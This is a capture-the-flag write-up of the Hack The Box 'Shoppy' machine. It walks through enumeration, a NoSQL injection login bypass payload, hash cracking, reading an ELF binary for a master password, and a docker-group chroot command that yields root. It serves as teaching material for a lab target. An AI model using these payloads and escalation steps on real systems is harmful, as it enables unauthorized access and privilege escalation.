Hack The Box write-ups : Shoppy
Enumeration portion :
NMAP:
So, there are two services running on the box, one of which is SSH and the other one HTTP. Usually, when we see this on a CTF, we should get ready to exploit some sort of critical website vulnerability.
In the scan, nmap got redirected to http://shoppy.htb . So we have to add this url to the /etc/hosts file.
vi /etc/hosts
Now , we access the website.
Nothing really interesting here, so we continue our enumeration with some directory busting and VHOST discovery (subdomain discovery).
I will be using gobuster for both of these tasks, however feel free to use whichever tool suits you best.
This is the command I used for subdomain discovery :
┌──(kali㉿kali)-[~/htb/shoppy]
└─$ gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://shoppy.htb/And this is the command I used for directory busting:
┌──(kali㉿kali)-[~/htb/shoppy]
└─$ gobuster dir -u http://shoppy.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txtAfter running both of the commands, I found there is another domain at : mattermost.shoppy.htb , and two directories which are truly working and interesting : /admin, /login. Both of /admin and /login lead to /login.
Investigating the login page
Taking a look at this login, I figured there must be some sort of SQL injection. I tried many default credentials , however nothing worked.
After testing pretty much all of the known SQL injection auth bypass payloads, I figured there was only one left to test, which was NoSQL. Click here to read an article from HackTricks regarding this service and payloads to use for it.
The payload that works is -> admin'||'1==1
Foothold
This is the administrator page of Shoppy. After looking around, I realised the only function that is present on this back-end is the ability to search for users. We could theoretically fuzz the search parameter with a list of users, however something smarter to do is to just use the same payload in that field.
The reason for this, is because when we inject '||'1==1 . We are basically saying or 1=1 which ALWAYS returns true. Because it will be true, it will return the entire list of users.
After you download the export JSON file, you’ll be met with these two users. Take their hashes to https://crackstation.net/ and crack them there. The only hash that will crack is Josh’s hash.
You can try to log in with his credentials on the shoppy.htb website, however nothing new will appear. Now it’s time to add mattermost.shoppy.htb to the /etc/hosts file, just like we did earlier.
Now , for the username enter josh and for the password, enter the one you’ve just cracked, from the export file.
Right out of the bat, we can see we spotted credentials in this chat room. Now , I’ve enumerated every chat possible, however this was the only one containing sensitive information.
Now it’s time to get inside the box. Get those credentials, and SSH your way into the machine.
┌──(kali㉿kali)-[~/htb/shoppy]
└─$ ssh jaeger@10.10.11.180
jaeger@10.10.11.180's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Nov 29 02:55:12 2022 from 10.10.16.111
jaeger@shoppy:~$For the user flag cat /home/jaeger/user.txt
Privilege Escalation
I ran linpeas on the box , however it hasn’t really found anything useful. So , it’s time to do the priv esc the manual way.
Firstly , we check the groups.
jaeger@shoppy:~$ whoami
jaeger
jaeger@shoppy:~$ groups
jaeger
jaeger@shoppy:~$ However, we do see that nothing interesting pops up. So, let’s see if we can run any program as another user.
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager
jaeger@shoppy:~$And we can! We can run the password-manager program as the user deploy. Let’s investigate further.
jaeger@shoppy:~$ cd /home/deploy/
jaeger@shoppy:/home/deploy$ ls -lah
total 52K
drwxr-xr-x 3 deploy deploy 4.0K Jul 23 03:34 .
drwxr-xr-x 4 root root 4.0K Jul 22 13:12 ..
lrwxrwxrwx 1 deploy deploy 9 Jul 22 13:14 .bash_history -> /dev/null
-rw-r--r-- 1 deploy deploy 220 Mar 27 2022 .bash_logout
-rw-r--r-- 1 deploy deploy 3.5K Mar 27 2022 .bashrc
-rw------- 1 deploy deploy 56 Jul 22 13:15 creds.txt
lrwxrwxrwx 1 deploy deploy 9 Jul 23 03:34 .dbshell -> /dev/null
drwx------ 3 deploy deploy 4.0K Jul 23 03:31 .gnupg
-rwxr--r-- 1 deploy deploy 19K Jul 22 13:20 password-manager
-rw------- 1 deploy deploy 739 Feb 1 2022 password-manager.cpp
-rw-r--r-- 1 deploy deploy 807 Mar 27 2022 .profile
jaeger@shoppy:/home/deploy$We can see that we have the source code, as well as a creds.txt filer in this directory, however we do not have the rights to view either of them. Let’s run the password-manager program as deploy to see what happens.
jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager
Welcome to Josh password manager!
Please enter your master password: ???
Access denied! This incident will be reported !So, we need to have a master password to access the credentials. Let’s try to view the source code of an app itself. When code isn’t compiled correctly and it’s poorly written, sometimes there are leaks.
jaeger@shoppy:/home/deploy$ cat password-manager
ELF> @H@@8
@@@@h���`
`
�� ���-�=�=�P�-�=����DDP�td� � � LLQ�tdR�td�-�=�=PP/lib64/ld-linux-x86-64.so.2GNU@
)�GNU�▒�e�ms�� .�Ҵ��43H
C-�����fFr�S�w �� , N�"�▒�A▒#▒�@__gmon_start___ITM_deregisterTMCloneTable_ITM_registerTMCloneTable_ZNSaIcED1Ev_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6__ZSt3cin_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc_ZNSt8ios_base4InitD1Ev_ZNSolsEPFRSoS_E__gxx_personality_v0_ZNSaIcEC1Ev_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc_ZNSt8ios_base4InitC1Ev_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev_ZSt4cout_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE7compareERKS4__ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RNSt7__cxx1112basic_stringIS4_S5_T1_EE_Unwind_Resume__cxa_atexitsystem__cxa_finalize__libc_start_mainlibstdc++.so.6libgcc_s.so.1libc.so.6GCC_3.0GLIBC_2.2.5CXXABI_1.3GLIBCXX_3.4GLIBCXX_3.4.21( P&y
@6 u▒i HӯkTt)_q��k��4����@�?�?�?�?�?�?�?�@�@▒�A▒@ @(@0@8@@@HP@ X@
`@
h@
x@�@H�H��/H��t��H���5�/�%�/@�%�/h������%�/h������%�/h������%�/h������%�/h������%�/h������%�/h������%�/h�p����%�/�`����%�/h �P����%�/h
�@����%�/h
�0����%�/h
H�=���.�DH�=I/H�B/H9�tH�n.H��t �����H�=/H�5/H)�H��H��?H��H�H��tH�E.H����fD���=11u/UH�=�-H��t
H�=�.�-����h���� 1]������H��H�S,H��H������H�E�H�������H�E�H����������<H��H�E�H��������H��H�E�H���w����H��H�E�H���f���H��H���
���H�]���UH��H���}��u��}�u2�}���u)H�=�.�����H�u,H�5�.H��+H���/������UH�����������]��AWL�=W)AVI��AUI��ATA��UH�-P)SL)�H������H��t�L��L��D��A��H��H9�u�H�[]A\A]A^A_��H�H��Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !@����0����@���h%����
��� T���@p���`�����zRx
����+zRx
$�����F▒J
�?▒;*3$"Dh��zPLRx��
E�� $$%�����A�C
D �����IA�C
�
P���A�C
D���]B�I▒�E �E(�D0�H8�G@j8A0A(B B▒B, �����^�������4�(6
��=▒�����8
z
▒@P
� P ▒������o@ ���o���o
���o�=6FVfv���������@GCC: (Debian 10.2.1-6) 10.2.1 20210110��8�
@ �
� � 0!�"�=�=�=�?▒@�@▒�@�
P�!�7▒�BC�=jv�=��� �▒�B��I4��▒�"��&�
9�=B�=S�=f▒@|��@� �@� �"�H�@U�!������� +1u���@�)▒�@?��@N▒C��▒�@�P]%E ax���▒�A▒�� � �crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrypassword-manager.cpp_ZStL19piecewise_construct_ZStL8__ioinit_Z41__static_initialization_and_destruction_0ii_GLOBAL__sub_I_main__FRAME_END____GNU_EH_FRAME_HDR_DYNAMIC__init_array_end__init_array_start_GLOBAL_OFFSET_TABLE__ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE7compareERKS4_@GLIBCXX_3.4.21_edata_IO_stdin_used__cxa_finalize@GLIBC_2.2.5_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_@GLIBCXX_3.4__dso_handle_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev@GLIBCXX_3.4.21DW.ref.__gxx_personality_v0system@GLIBC_2.2.5__cxa_atexit@GLIBC_2.2.5_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc@GLIBCXX_3.4.21_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@GLIBCXX_3.4_ZNSolsEPFRSoS_E@GLIBCXX_3.4_ZNSaIcED1Ev@GLIBCXX_3.4__TMC_END___ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RNSt7__cxx1112basic_stringIS4_S5_T1_EE@GLIBCXX_3.4.21_ZSt4cout@GLIBCXX_3.4_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_@GLIBCXX_3.4.21__data_start_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev@GLIBCXX_3.4.21__bss_start_ZNSt8ios_base4InitC1Ev@GLIBCXX_3.4__libc_csu_init__gxx_personality_v0@CXXABI_1.3_ITM_deregisterTMCloneTable_Unwind_Resume@GCC_3.0_ZNSaIcEC1Ev@GLIBCXX_3.4__libc_csu_fini_ZSt3cin@GLIBCXX_3.4__libc_start_main@GLIBC_2.2.5__gmon_start___ITM_registerTMCloneTable_ZNSt8ios_base4InitD1Ev@GLIBCXX_3.4.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.gcc_except_table.init_array.fini_array.dynamic.got.plt.data.bss.comment�#��$6�� D��No
88▒V��z^���o
2k���o@ @ z� � ▒�B
P▒�� � ���� � �� � L�0!0!��"�"��=����=���?��@�@�0▒
�@�0@@0�0'�0▒ 9!)?There is a bunch of gibberish , but we do have this somewhere inside .
Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtSo , now we have the master password : Sample .
jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!Perfect, we’re closer to getting a root shell. Let’s switch users to deploy.
jaeger@shoppy:/home/deploy$ su deploy
Password:
$ whoami
deploy
$ groups
deploy docker
$So , now we’re in deploy. Prior to running the command groups , we can see that we are a part of docker.
Going to gtfobins , we can see that docker is exploitable, if we have the rights to docker, and we do. So , let’s try to get a shell.
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
#We have rooted the box. All there’s left to do now is to get the root flag and submit it to HackTheBox
# cat /root/root.txt
7979{CENSORED}fdI hope you’ve enjoyed this walkthrough as much as I’ve enjoyed making it! For more content like this, hit that follow button.
